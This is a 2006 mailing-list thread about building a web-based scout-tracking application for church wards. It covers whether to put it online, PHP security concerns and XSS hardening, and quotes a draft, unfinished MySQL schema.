Re: [Ldsoss] Scout Tracking

[Stacey]

Steven H. McCown wrote:


The key is that if you don’t *really* have to be web-accessible, then 
don’t.




If it isn't web-accessible then parents continue to be largely "out of 
the loop" on their son's status in scouts and we continue to spend money 
out of our YM budgets for TroopMaster licenses. Why would we want to 
take the time to change to save about $40/yr? However, collectively with 
all the wards this could add up for the Church as a whole. We don't 
think collectively at the ward level, however. Therefore, $40/yr for 
scout tracking software can be easily budgeted for to save a headache.


Each parent could have their own copy of the scout tracking software... 
Wrong. Installing and supporting an application on every parent's 
computer is impractical. We would end up fixing parent's operating 
system issues for the most part. Scout masters want to be scout masters 
and not software support specialist.


IMHO,

-stacey.
___
Ldsoss mailing list
Ldsoss@lists.ldsoss.org
http://lists.ldsoss.org/mailman/listinfo/ldsoss

RE: [Ldsoss] Scout Tracking

[Steven H. McCown]

There are some more serious security
implications with your choice of tools (e.g., injections).  Far from the
definitive word, these are hotly debated, demonstrated, and refuted.  Here
are a couple of blog articles that you should research and consider re PHP:

 

- PHP Insecurity: Failure of Leadership (http://www.greebo.net/?p=320)

 

- PHP Security: Dumb Users or Dumb APIs? (http://www.sitepoint.com/blogs/2006/01/24/php-security-dumb-users-or-dumb-apis/)

 

This is from last year’s Blackhat,
but it’s fairly new and still relevant:

 

- Beefed up OWASP 2.0 introduced at
BlackHat (http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci443,00.html)
 and (http://www.owasp.org/index.php/Main_Page)


 

How to harden this?  It’s a
moving target.  PHP6?  Until it is released and then I’ll say
PHP7…   ;-)

 

The key is that if you don’t *really*
have to be web-accessible, then don’t.

 

Steve

 









From:
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Oscar Schultz
Sent: Friday, August 18, 2006 5:48
PM
To: [EMAIL PROTECTED]; LDS Open Source Software
Subject: Re: [Ldsoss] Scout
Tracking



 

you ever get the table definitions done as SQL?

Hello list,

Between scout camp, yw camp and family reunions I done some but
not as much as I wanted to the tracker.

Below is what I currently have

The question for the list is how to make the user interface
secure.

The tools I have selected are mysql, php5, pear, apache2, and
linux as the base os.

The application will run as a web server (server side code rather
than _javascript_) and will require cookies.

I have been reading about cross-side script attacks (xss). xss
looks to be a serious problem since it uses man in the middle to steal cookies.

Anyone have some ideas how to harden a web application so I can
avoid design problems upfront. 

thanks

oscar 

create database tracker;

grant create,alter,select,insert,update,delete on tracker.* to
[EMAIL PROTECTED]

use tracker;

#the table to record personal information

create table people (

record_id int(32) unsigned auto_increment,

firstname varchar
(30) not null default '',

middlename varchar
(30) not null default '',

lastname varchar
(30) not null default '',

preferredname varchar
(30) not null default '',

gender varchar
(1),

birthdate varchar
(2),

birthmonth varchar
(3),

birthyear varchar
(4),

emergency_passphrase varchar
(30),

 date

);

# the table to record personal address information

# 1 people record to many address record relationship

create table address (

record_id int(32)
unsigned auto_increment,

people_record_id int(32)
unsigned auto_increment,

address1 varchar
(40),

address2 varchar
(40),

city varchar (40),

county
 varchar
(40),

state varchar (40),

zipcode varchar (9),

type varchar (10), # (primary, secondary, mailbox, residence,
shipping, other, unknown)

date ?

);

# the table to record personal phone information

# 1 people record to many phone record relationship

create table phone (

record_id int (32) unsigned auto_increment,

people_record_id int(32) unsigned auto_increment,

type varchar (10), # (personal cell, home, business, home2,
business cell) 

area_code varchar (3),

number varchar (7),

extension varchar (7).

date ?.

);

# a table to record emergency contacts

# 1 personal to many personal relationship

create table emergency_contact

record_id int (32) unsigned auto_increment,

people_record_id int (32) unsigned, #(participate) 

people_record_id int (32) unsigned, #(emergency contact)

relationship varchar (32), # string

date ?

);

# the authorization table to control access via the 

# web interface

create table auth (

record_id int (32) unsigned auto_increment,

fname, #first_name

mname, #middle_name

lname, #last_name

userid,

password,

password2,

auth_level,

email,

password_start_date,

password_status,

date ?

);

# a table to record the high level in the hierarchy

# of the award requirement, subrequirement chain

create table awards (

record_id int (32) unsigned auto_increment,

name varchar (128), #the name of the award

org_group int (32) unsigned, # link to the group record

max_age int (2) unsigned, # max age the award can be obtained

min_age int (2) unsigned, # minimum age for award

date ?

);

# a table to record each completed award

# many awards to 1 people relationship

create table completed_awards (

record_id int (32) unsigned auto_increment,

people_record_id int (32) unsigned auto_increment,

award_record_id int (32) unsigned auto_increment,

date_completed varchar (9), #ddmmm

);

# a table to record which image file relates to which person

# each file is a scanned image of the medical form

create table medical_form (

record_id int (32) unsigned auto_increment,

people_record_id int (32) unsigned auto_increment,

image_record_id int (32) unsigned auto_increment,

date ?

);

# a table to record which image file related to which person

# and